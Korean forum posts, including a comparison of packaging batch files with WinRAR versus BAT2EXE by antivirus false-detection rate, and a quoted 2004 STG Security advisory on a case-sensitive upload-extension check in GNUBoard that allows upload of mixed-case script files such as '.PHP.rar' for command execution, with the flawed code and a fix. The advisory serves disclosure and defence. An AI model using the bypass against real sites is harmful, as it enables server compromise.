이제 WINRAR와 BAT2EXE 을 장점과 단점.
BAT 2 EXE
장점 : 파일을 용량이 적다.
안에 파일을 보기가 어렵다.
단점 : 바이러스 오진율이 높다.
WINRAR
장점 : 바이러스 오진율이 적다.
단점 : 파일을 용량이 크다.
RAR로 압축되어 안의 파일을 맘대로 볼수 있다.
http://www.securitytracker.com/alerts/2005/Jan/1012812.html
국내 해커들이 쉬쉬하는 사이....
해외 해커 그룹이 해당 보안 취약점을 발표해버렸습니다.
opt님이 보안 취약점을 열심히 올리시네요.
수고가 많으십니다. santy 웜이 아주 발작을 하는 시점에 무덤덤하네요. 그누보드는 근 한달 사이에 2번째인듯하네요
이젠 보드 사이를 해매고 있는데 이것도 spyki에 바로 올라가겠는데요.
ps. 이젠 무슨 보드를 써야할지 휴우
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
STG Security Advisory: [SSA-20041224-21] File extensions restriction bypass
vulnerability in GNUBoard.
Revision 1.0
Date Published: 2004-12-24 (KST)
Last Update: 2005-01-33
Disclosed by SSR Team (advisory at stgsecurity.com)
Summary
========
GNUBoard is one of widely used web BBS applications in Korea. However, an
input validation flaw can cause malicious attackers to run arbitrary
commands with the privilege of the HTTPD process, which is typically run as
the nobody user.
Vulnerability Class
===================
Implementation Error: Input validation flaw
Impact
======
High : arbitrary command execution.
Affected Products
================
GNUBoard 3.40 and prior
Vendor Status: NOT FIXED
========================
2004-12-09 Vulnerability found
2004-12-09 Vendor contacted and confirmed.
2005-01-03 Official release.
Details
=======
Implementation of check every file extension of upload files is
case-sensitive. Bypassing this mechanism, malicious attackers can upload
arbitrary script files (php, pl, cgi, etc) to a web server.
gbupdate.php (107 line)
- ----
// 실행가능한 스크립트 확장자
$source = array ("/\.php/", "/\.htm/", "/\.cgi/", "/\.pl/");
$target = array (".phpx", ".htmx", ".cgix", ".plx");
- ----
gbupdate.php (142 line)
- ----
// php_x 와 같은 방법으로 스크립트 실행을 하지 못하게 하였으나 abc.php._x
는 실행되는 버그가 있음
$filename = preg_replace($source, $target, $filename);
// 접두사를 붙인 파일명
$upload[$i] = $prefix . $filename;
$dest_file = "./data/file/$bo_table/$upload[$i]";
- ----
malicious attackers can upload [attack].PHP.rar, [attack].pHp.rar, etc.
Solution
=========
modify 108th line of gbupdate.php as following
$source = array ("/\.php/i", "/\.htm/i", "/\.cgi/i", "/\.pl/i");
Vendor URL
==========
http://www.sir.co.kr/
Credits
======
Jeremy Bae at STG Security
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0
iQA/AwUBQdjxDD9dVHd/hpsuEQIfQgCdH1I3gYRYQhM49hOOEKg35puXscUAoK07
zKwL5QKjuY2Nb2yzKAtFwDhJ
=o+Ui
-----END PGP SIGNATURE-----